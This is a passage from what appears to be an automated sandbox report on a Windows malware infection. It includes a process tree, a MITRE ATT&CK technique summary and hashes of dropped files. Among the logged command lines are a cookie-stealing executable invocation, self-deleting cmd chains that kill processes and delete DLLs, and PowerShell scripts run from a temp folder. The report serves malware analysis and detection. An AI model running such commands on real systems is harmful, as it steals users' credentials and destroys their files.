                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:6996
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                        8⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:3084
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                          9⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:4236
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:8112
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:7420
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:8020
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:7364
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslAC31.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:7668
                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:8000
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3608
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                      3⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4104
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping 127.0.0.1
                                                                                                        4⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:7736
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    PID:6868
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4828
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6396
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6780
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6104
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5876
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                  1⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1016
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:3632
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:3520
                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                  1⤵
                                                                                                  • Enumerates connected drives
                                                                                                  • Drops file in Program Files directory
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies registry class
                                                                                                  PID:4260
                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 731285628DD2C91A967EF06E1D15AE23 C
                                                                                                    2⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:4760
                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding F85A57C9B87010691A56A7CAA46225E9
                                                                                                    2⤵
                                                                                                      PID:7156
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                        3⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:7580
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 76E84663C516219D99BF12FD0AF4EA3E E Global\MSI0000
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5148
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4884
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:6148
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:7868
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    PID:5396
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:6124
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:7024
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8847.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\8847.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:8136
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9596.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\9596.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5464
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AEBC.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\AEBC.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4996
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                      2⤵
                                                                                                        PID:7800
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout 1
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4216
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AEBC.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\AEBC.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks processor information in registry
                                                                                                        PID:4436
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im AEBC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AEBC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          3⤵
                                                                                                            PID:4308
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im AEBC.exe /f
                                                                                                              4⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:5112
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:6172
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1488
                                                                                                          2⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Program crash
                                                                                                          PID:7492
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B351.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\B351.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:6132
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B351.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\B351.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2016
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B7E6.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\B7E6.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6020
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 740
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:812
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 780
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7412
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 852
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:8012
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 876
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7680
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1188
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:4472
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1192
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Program crash
                                                                                                          PID:7156
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1320
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:5752
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1244
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7388
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1092
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:4668
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1352
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6188
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1324
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6980
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1360
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7124
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1312
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7236
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 644
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7276
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1360
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7004
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 720
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7788
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1352
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7056
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1256
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6520
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1264
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6592
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1244
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6884
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1328
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7468
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1288
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:4360
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1352
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:4244
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1224
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7372
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1412
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6744
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1396
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7888
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1296
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7956
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1376
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7848
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 644
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:7516
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1260
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:6672
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1404
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Program crash
                                                                                                          PID:7784
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1468
                                                                                                          2⤵
                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                          • Program crash
                                                                                                          PID:2304
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5492
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4500
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:4488
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4948
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:3888
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4952
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:6976
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:6388
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:6568
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:4904
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:7184
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:7932
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                          1⤵
                                                                                                                            PID:4336

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                          Execution

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Persistence

                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                          1
                                                                                                                          T1060

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Privilege Escalation

                                                                                                                          Scheduled Task

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Defense Evasion

                                                                                                                          Disabling Security Tools

                                                                                                                          2
                                                                                                                          T1089

                                                                                                                          Modify Registry

                                                                                                                          5
                                                                                                                          T1112

                                                                                                                          BITS Jobs

                                                                                                                          1
                                                                                                                          T1197

                                                                                                                          Install Root Certificate

                                                                                                                          1
                                                                                                                          T1130

                                                                                                                          Credential Access

                                                                                                                          Credentials in Files

                                                                                                                          4
                                                                                                                          T1081

                                                                                                                          Discovery

                                                                                                                          Software Discovery

                                                                                                                          1
                                                                                                                          T1518

                                                                                                                          Query Registry

                                                                                                                          5
                                                                                                                          T1012

                                                                                                                          System Information Discovery

                                                                                                                          6
                                                                                                                          T1082

                                                                                                                          Security Software Discovery

                                                                                                                          1
                                                                                                                          T1063

                                                                                                                          Peripheral Device Discovery

                                                                                                                          2
                                                                                                                          T1120

                                                                                                                          Remote System Discovery

                                                                                                                          1
                                                                                                                          T1018

                                                                                                                          Collection

                                                                                                                          Data from Local System

                                                                                                                          4
                                                                                                                          T1005

                                                                                                                          Command and Control

                                                                                                                          Web Service

                                                                                                                          1
                                                                                                                          T1102

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            MD5

                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                            SHA1

                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                            SHA256

                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                            SHA512

                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                          • C:\Program Files\Java\WGXFWUTIYP\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\Java\WGXFWUTIYP\ultramediaburner.exe
                                                                                                                            MD5

                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                            SHA1

                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                            SHA256

                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                            SHA512

                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                          • C:\Program Files\install.dat
                                                                                                                            MD5

                                                                                                                            806c3221a013fec9530762750556c332

                                                                                                                            SHA1

                                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                            SHA256

                                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                            SHA512

                                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                          • C:\Program Files\install.dll
                                                                                                                            MD5

                                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                            SHA1

                                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                            SHA256

                                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                            SHA512

                                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                            MD5

                                                                                                                            fa08f6463ef7be976f91339d5c800cd3

                                                                                                                            SHA1

                                                                                                                            8f179db874997b62c87d6da487a4b3a4db332a50

                                                                                                                            SHA256

                                                                                                                            c9b2bbc388046f9e34ce5b00e7624956916650f0b4cc4db3ce9f3ee2fb024af3

                                                                                                                            SHA512

                                                                                                                            80424f97f0a2b9244a378c0713de0143e7c9165a6545d706c162b6b0554b4c7d012f1f99668b6d1edf098a7190b456307e7ff88241c61c5dbad39b58369faaf3

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                            MD5

                                                                                                                            32015affbb6fffe4dbf75ac1f9230d6d

                                                                                                                            SHA1

                                                                                                                            f494de4c80b03946370e546980ba69850fda573f

                                                                                                                            SHA256

                                                                                                                            6bc9c58c8c13d9b61e2a14a27ac7f9c9b3f8aa9d87787cf99f8ab16671783cd5

                                                                                                                            SHA512

                                                                                                                            4f9a2753eaff496962fb22ad016fde4368444f09b29cd78a0596ada8fb78b4c419ebec19b41b40e891cd00e692d2f78a95302c8d5f1c47143c9a1b9625b68443

